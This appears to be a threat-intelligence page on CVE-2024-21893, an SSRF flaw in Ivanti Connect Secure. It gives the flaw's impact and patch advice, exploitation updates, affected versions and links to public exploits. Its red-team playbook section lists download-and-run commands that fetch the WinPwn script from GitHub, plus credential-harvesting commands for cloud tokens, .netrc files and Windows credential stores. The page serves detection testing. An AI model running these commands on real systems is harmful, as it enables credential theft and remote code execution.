CVE-2024-21893
Overview
This vulnerability is a server-side request forgery (SSRF) flaw originating from improper validation in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA. The root cause lies in the SAML authentication workflow where crafted requests can manipulate internal URL handling, specifically within the POST /dana-ws/saml20.ws endpoint. The affected feature processes SAML assertions without adequate restrictions on the destination of server-side HTTP requests.
Vulnerability Description
A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
Impact
An unauthenticated attacker can leverage this SSRF vulnerability to access restricted internal network resources that are otherwise inaccessible externally. This enables bypassing authentication mechanisms and potentially gathering sensitive information or interacting with internal services. No user interaction or prior credentials are necessary, increasing the risk of unauthorized data exposure and lateral movement within the affected environment.
Solution
Ivanti has released security advisories addressing this SSRF vulnerability in Ivanti Connect Secure and Ivanti Policy Secure versions 9.x and 22.x. Administrators should apply the vendor-provided patches as detailed in the official Ivanti advisory at https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure. It is critical to update to the fixed versions or apply recommended configuration changes to mitigate the issue promptly.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A server-side request forgery (SSRF) vulnerability has been identified in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for Zero Trust Access. This flaw allows an attacker to send crafted requests from the vulnerable server to internal or external resources, bypassing authentication mechanisms. The vulnerability arises from improper validation of user-supplied input, enabling an attacker to manipulate requests that the server processes. This can lead to unauthorized access to sensitive internal resources, such as databases or internal APIs, which are typically protected by authentication protocols.
The attack vector for this vulnerability is particularly concerning due to its potential for exploitation without requiring extensive technical skills. An attacker could leverage this flaw by crafting a malicious request that the server interprets as legitimate. For instance, an attacker could target endpoints that are not directly accessible from the internet, effectively using the server as a proxy to access restricted resources. This could include accessing sensitive configuration files, internal services, or even executing commands on the server itself, depending on the configuration and security measures in place. The ease of exploitation makes this vulnerability a significant threat to organizations using the affected products.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on these Ivanti products for secure access and policy enforcement. Unauthorized access to internal resources can lead to data breaches, loss of sensitive information, and potential regulatory penalties. Additionally, the exploitation of this vulnerability could facilitate further attacks, such as lateral movement within a network, allowing attackers to escalate privileges or deploy malware. The business risks associated with such incidents include reputational damage, financial loss, and the costs associated with incident response and remediation efforts.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in their systems. Additionally, monitoring network traffic for unusual patterns or unauthorized access attempts can provide early warning signs of exploitation. Organizations should also ensure that their systems are updated to the latest versions, as vendors typically release patches to address known vulnerabilities. Implementing strict input validation and output encoding practices can further reduce the risk of SSRF attacks by ensuring that user-supplied data is properly sanitized before being processed by the server.
In conclusion, the server-side request forgery vulnerability in the SAML component of Ivanti products poses a significant threat to organizations that utilize these systems. The potential for unauthorized access to sensitive resources, combined with the ease of exploitation, underscores the importance of proactive security measures. By adopting comprehensive detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities, ensuring the integrity and confidentiality of their systems and data.
CSURFACE threat intelligence has detected a slight increase in activity exploiting the SSRF vulnerability identified as CVE-2024-21893 in Ivanti Connect Secure and related products. This uptick coincides with the continued availability of multiple proof-of-concept exploits and a Metasploit module that chains this SSRF flaw with a command injection vulnerability, facilitating unauthenticated remote code execution. While the overall exploitation trend remains stable, the presence of these publicly accessible tools lowers the barrier for adversaries, including ransomware-affiliated groups, to leverage this vulnerability in targeted attacks. Consequently, the risk profile for affected organizations has intensified, underscoring the urgency for defenders to maintain vigilant monitoring. Although no new ransomware campaigns have been definitively linked to this vulnerability since the last update, the persistent association with known ransomware actors keeps this threat vector highly relevant in the current landscape.
Update 2 — July 03, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-21893, with telemetry indicating a significant uptick in adversary activity leveraging this SSRF vulnerability. This increase coincides with the wider availability of new proof-of-concept exploit tools and an updated Metasploit module that chains CVE-2024-21893 with CVE-2024-21887 to achieve unauthenticated remote code execution. The enhanced accessibility of these tools lowers the technical barrier for threat actors, including ransomware-affiliated groups, to conduct successful intrusions against vulnerable Ivanti Connect Secure and Policy Secure deployments. Although the overall exploitation trend remains stable, the sharp rise in detection events signals growing attacker interest and operational use. This development elevates the threat level, reinforcing the vulnerability’s criticality in the current threat landscape and underscoring the need for heightened vigilance among defenders monitoring for exploitation attempts.
Affected Products (118)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r2.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r4.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r5.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r6.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r10:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11.4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11.5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r12:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Ivanti Connect Secure Unauthenticated Remote Code Execution
exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893
|
sfewer-r7 | Unknown | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
h4x0r-dz/CVE-2024-21893.py
CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure
|
h4x0r-dz | 94 | 18 | 2024-02-02 | View |
|
Chocapikk/CVE-2024-21893-to-CVE-2024-21887
CVE-2024-21893 to CVE-2024-21887 Exploit Toolkit
|
Chocapikk | 27 | 4 | 2024-02-03 | View |
Threat Feed
26 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
30%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-21893 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-21893 |